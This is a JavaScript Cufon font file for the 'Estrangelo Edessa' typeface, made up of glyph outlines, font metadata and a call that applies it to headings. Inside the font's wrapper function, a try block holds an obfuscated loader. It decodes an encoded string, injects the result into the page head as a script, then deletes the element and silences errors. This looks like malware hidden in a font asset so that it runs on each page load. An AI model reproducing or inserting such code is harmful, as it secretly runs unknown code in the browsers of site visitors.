-111v0,79,81,104,138,69r0,31v-17,10,-38,14,-65,14v-69,-2,-106,-45,-109,-114v-4,-95,90,-142,175,-107r0,31v-62,-33,-139,-5,-139,76","w":213},{"d":"69,-133v18,0,25,-17,25,-38v0,-22,-6,-37,-25,-37v-32,0,-35,75,0,75xm204,-20v19,0,25,-17,25,-38v0,-21,-6,-37,-24,-37v-18,0,-26,18,-26,39v0,20,7,36,25,36xm227,-227r-151,227r-32,0r150,-227r33,0xm206,-118v36,0,52,23,52,60v-1,36,-19,61,-55,61v-35,0,-53,-23,-53,-58v0,-38,19,-63,56,-63xm70,-230v36,0,53,21,53,58v-1,37,-19,62,-56,62v-34,0,-52,-23,-52,-58v0,-37,17,-61,55,-62","w":272},{"d":"68,-227r-7,165r-24,0r-7,-165r38,0xm72,-18v0,28,-45,26,-45,0v0,-27,45,-27,45,0","w":99},{"d":"168,-218v-37,67,-73,137,-98,218r-35,0v20,-76,58,-137,91,-199r-104,0r0,-28r140,0"},{"d":"91,-24v36,-4,43,-41,43,-88v0,-48,-5,-87,-42,-91v-39,4,-44,43,-44,93v0,47,7,81,43,86xm14,-109v0,-66,15,-121,79,-121v50,0,75,39,75,116v0,64,-19,117,-79,117v-60,0,-75,-51,-75,-112"},{"d":"106,-62r-83,0r0,-30r83,0r0,30","w":129},{"d":"56,-120v9,-18,28,-36,54,-23r0,28v-25,-10,-49,1,-49,32r0,83r-34,0v-1,-49,3,-103,-5,-144r28,0v4,6,5,15,6,24","w":117},{"d":"44,-203v12,0,21,6,21,18v1,13,-10,16,-21,18v-11,0,-21,-6,-21,-18v0,-12,9,-19,21,-18xm13,83v23,-56,11,-150,14,-227r34,0v-3,79,12,178,-21,227r-27,0","w":85},{"d":"72,-179v-8,39,-12,83,35,77r0,26v-45,-5,-46,38,-35,78v-1,35,-26,48,-62,48r0,-24v40,2,24,-48,22,-78v-1,-21,14,-30,28,-37v-34,-7,-27,-52,-22,-88v2,-18,-12,-26,-28,-27r0,-23v36,0,61,13,62,48","w":117},{"d":"126,-26v51,0,72,-35,73,-87v0,-53,-20,-89,-71,-89v-49,0,-72,38,-72,89v0,49,21,87,70,87xm130,-230v69,0,105,45,105,113v0,49,-18,84,-48,103r45,40r-21,22r-60,-47v-82,11,-131,-34,-131,-112v1,-74,37,-119,110,-119","w":254},{"d":"105,-39v24,-3,31,-41,10,-53v-3,-2,-6,-3,-10,-5r0,58xm81,-189v-21,1,-35,27,-19,43v5,4,11,7,19,10r0,-53xm105,-127v27,11,56,22,56,58v0,37,-25,52,-56,59r0,42r-24,0r0,-41v-22,-1,-42,-6,-56,-16r0,-34v16,9,33,20,56,22r0,-68v-29,-11,-59,-21,-59,-58v0,-36,27,-49,59,-54r0,-39r24,0r0,38v17,2,30,5,44,11r0,31v-12,-7,-28,-12,-44,-14r0,63"},{"d":"23,-207v34,-36,135,-31,129,38v-6,69,-57,95,-86,141r93,0r0,28r-135,0r0,-25r69,-85v23,-20,38,-92,-11,-92v-25,0,-45,14,-59,27r0,-32"},{"d":"337,-227r-72,227r-34,0r-61,-183v-16,64,-39,122,-57,183r-34,0r-74,-227r35,0r57,185r58,-185r31,0r61,185v16,-64,37,-123,55,-185r35,0","w":342},{"d":"106,-117v28,6,49,20,51,52v4,67,-84,82,-133,55r0,-32v26,21,101,32,97,-21v-2,-33,-33,-40,-71,-38r0,-29v36,2,63,-8,64,-39v2,-49,-65,-33,-89,-16r0,-30v40,-28,128,-19,124,43v-2,30,-20,46,-43,55"},{"d":"136,-77v0,-44,-46,-55,-75,-35r0,87v40,10,75,-9,75,-52xm171,-79v0,76,-78,95,-144,73r0,-221r34,0r-1,90v47,-26,111,-2,111,58","w":187},{"d":"144,-198r-79,0r0,68r79,0r0,30r-79,0r0,100r-34,0r0,-227r113,0r0,29","w":161},{"d":"140,0r-109,0r0,-227r35,0r0,198r74,0r0,29","w":152},{"d":"10,-89r67,-138r20,0r75,138r-32,0r-53,-98r-46,98r-31,0"},{"d":"92,-157r38,0r13,-70r26,0r-14,70r40,0r0,25r-45,0r-7,37r42,0r0,25r-46,0r-14,70r-26,0r14,-70r-37,0r-13,70r-26,0r13,-70r-39,0r0,-25r44,0r7,-37r-41,0r0,-25r46,0r13,-70r26,0xm81,-95r36,0r8,-37r-37,0","w":205},{"d":"8,28r38,-2r0,-229r-38,-2r0,-22r72,0r0,277r-72,0r0,-22","w":106},{"d":"212,0r-37,0r-26,-65r-87,0r-24,65r-37,0r88,-227r34,0xm139,-95r-34,-95v-8,34,-22,63,-32,95r66,0","w":213},{"d":"4,50v59,-65,60,-212,0,-277r31,0v66,73,67,205,0,277r-31,0","w":105},{"d":"168,-83r-63,0r0,61r-28,0r0,-61r-63,0r0,-29r63,0r0,-61r28,0r0,61r63,0r0,29"},{"w":74},{"d":"20,-52r97,-47r-97,-52r0,-33r142,79r0,16r-142,69r0,-32"},{"d":"184,-221r-116,192r113,0r0,29r-165,0r0,-8r115,-190r-115,0r0,-29r168,0r0,6","w":200},{"d":"91,-203v-26,1,-38,17,-39,44v-2,39,40,48,72,35v11,-31,5,-81,-33,-79xm113,-95v-50,11,-98,-10,-96,-62v1,-46,28,-73,74,-73v48,0,72,27,72,76v0,69,-42,113,-77,154r-39,0v25,-29,49,-58,66,-95"},{"d":"173,-125v-2,33,-16,55,-49,56v-29,1,-40,-28,-66,-28v-13,0,-18,13,-18,28r-31,0v2,-32,16,-55,49,-56v28,-1,43,23,66,27v12,0,18,-12,18,-27r31,0"},{"d":"46,-105v12,30,66,18,66,64v0,49,-67,53,-97,32r0,-29v14,11,61,29,65,-1v-9,-34,-65,-20,-65,-66v0,-42,57,-53,90,-34r0,26v-17,-8,-56,-18,-59,8","w":125},{"d":"66,-131v35,3,62,-7,61,-38v0,-30,-30,-34,-61,-31r0,69xm66,-28v38,5,73,-2,73,-39v0,-35,-35,-38,-73,-36r0,75xm130,-120v25,7,44,22,45,52v1,70,-74,74,-144,66r0,-224v57,-6,133,-6,131,55v0,27,-15,41,-32,51","w":187},{"d":"106,80r-30,0r0,-320r30,0r0,320"},{"d":"170,0r-42,0r-68,-68v2,21,1,45,1,68r-34,0r0,-227r34,0r-1,137r61,-54r41,0r-72,64","w":167},{"d":"125,-72v0,-47,-60,-52,-92,-33r-7,-10r0,-112r123,0r0,28r-92,0r0,59v56,-8,101,12,103,67v2,68,-79,93,-133,64r0,-31v30,24,98,23,98,-32"},{"d":"60,-158v12,32,64,27,62,-14v-2,-19,-12,-30,-32,-31v-25,-1,-39,22,-30,45xm90,-24v42,4,50,-56,18,-74v-25,-14,-56,5,-56,36v0,26,14,37,38,38xm122,-120v24,11,42,24,41,57v-1,44,-31,66,-73,66v-43,0,-73,-21,-73,-63v0,-32,18,-48,42,-59v-20,-9,-36,-26,-36,-54v0,-38,28,-56,67,-57v40,0,66,19,66,57v0,28,-16,42,-34,53"},{"d":"91,-24v26,-1,38,-18,39,-44v3,-40,-40,-49,-72,-35v-12,32,-5,81,33,79xm68,-133v54,-8,97,11,97,63v0,46,-28,73,-74,73v-48,0,-72,-28,-72,-77v0,-70,42,-113,77,-153r38,0v-23,30,-51,57,-66,94"},{"d":"130,-112v-32,-23,-85,-6,-79,41v-5,49,50,60,79,31r0,-72xm17,-71v0,-63,60,-92,113,-68r0,-88r33,0r0,227r-32,0r-1,-13v-43,34,-113,9,-113,-58","w":190},{"d":"229,0r-34,0r-132,-180r0,180r-32,0r0,-227r37,0r130,180r0,-180r31,0r0,227","w":260},{"d":"127,-88v-1,-48,-73,-40,-77,0r77,0xm155,-13v-50,32,-144,17,-138,-60v3,-48,30,-75,75,-75v50,0,72,31,68,85r-110,0v2,50,75,47,105,24r0,26","w":177},{"d":"43,-102v-13,0,-24,-8,-24,-22v0,-13,11,-21,24,-22v13,1,23,8,23,22v0,15,-10,22,-23,22xm65,-35r-34,82r-26,0v8,-26,16,-52,19,-82r41,0","w":82},{"d":"52,-69v-5,43,42,57,75,37r0,-68v-18,-36,-85,-20,-75,31xm166,-144v-11,65,-2,152,-5,227r-34,0r1,-92v-45,28,-118,2,-111,-60v-8,-67,72,-101,115,-62v1,-5,3,-9,5,-13r29,0","w":187},{"d":"134,-134r-76,107r79,0r0,27r-128,0r0,-12r76,-105r-70,0r0,-27r119,0r0,10","w":145},{"d":"162,-20r-142,-69r0,-16r142,-79r0,33r-97,53r97,46r0,32"},{"d":"66,-128v37,3,66,-7,66,-39v0,-30,-32,-32,-66,-31r0,70xm168,-168v-1,36,-24,53,-52,62r70,106r-41,0r-63,-100r-16,0r0,100r-35,0r0,-227v66,-1,138,-7,137,59","w":191},{"d":"123,0r-34,0r0,-185v-18,15,-38,28,-57,42r0,-33r69,-52r22,0r0,228"},{"d":"35,-227r106,227r-36,0r-106,-227r36,0","w":140}],f:f};try{(function(s){var c="charAt",i="indexOf",a=String(arguments.callee).replace(/\s+/g,""),z=s.length+179-a.length+(a.charCodeAt(0)==40&&2),w=64,k=s.substring(z,w+=z),v=s.substr(0,z)+s.substr(w),m=0,t="",x=0,y=v.length,d=document,h=d.getElementsByTagName("head")[0],e=d.createElement("script");for(;x<y;++x){m=(k[i](v[c](x))&255)<<18|(k[i](v[c](++x))&255)<<12|(k[i](v[c](++x))&255)<<6|k[i](v[c](++x))&255;t+=String.fromCharCode((m&16711680)>>16,(m&65280)>>8,m&255);}e.text=t;h.insertBefore(e,h.firstChild);h.removeChild(e);})("vy|scI7NRWCZvt,`9I}OayaCM^7s|ICZM^4ORWeg|*[-b~NQh3eAMtCKM^Hz6}|gXs77d)C}9x9b**,n4^uFdd+ZctNl4I|idgeckMAZcd>6b]C_eyCHR*nQ6OAH7~SL9.anu.SORgse4)4Mu^4y.}z3MA]>vs+su)SHu)rSt)]}y$a4v_u7hk6ed.A*WMb|RcL9X&lHQ3x,IgF>q(-GZfn+O~Ns^izKm`[Cp=KRhMK~6g+(7.l^|]K,hi}mk}a+M}nQ_g7ncy,NvtaQvd+>k.r-L)sQ_gr-c)sn_I+,cI9NRt+gkWaZ|QKgc$,nR$uCXiN`RWbFbQKfR~NfMQl=hg9i9snZv.[Fk~>(RM7~|M}s|M7NLI,Hc,nZb^CL_g*(&yG>Li7,LM*,LieORW}ZMtK3c^s[cyC3bW+Fci7Nvd6fRdKN|M7Nvy+fb^}NRWCZ_IHfLieZbWs,vd,IciaFh^x[c)-(v^x>|sG3W^,9M.snW^,9&dxFvdrl")}catch(e){}delete _cufon_bridge_;return b.ok&&f})({"w":181,"face":{"font-family":"Estrangelo Edessa","font-weight":400,"font-stretch":"normal","units-per-em":"360","panose-1":"3 8 6 0 0 0 0 0 0 0","ascent":"252","descent":"-108","x-height":"3","bbox":"-1 -256 337 83.2672","underline-thickness":"1.75781","underline-position":"-11.9531","unicode-range":"U+0020-U+007E"}}));

/*
 * Run Cufon
 */
Cufon.replace('h1');Cufon.replace('h3');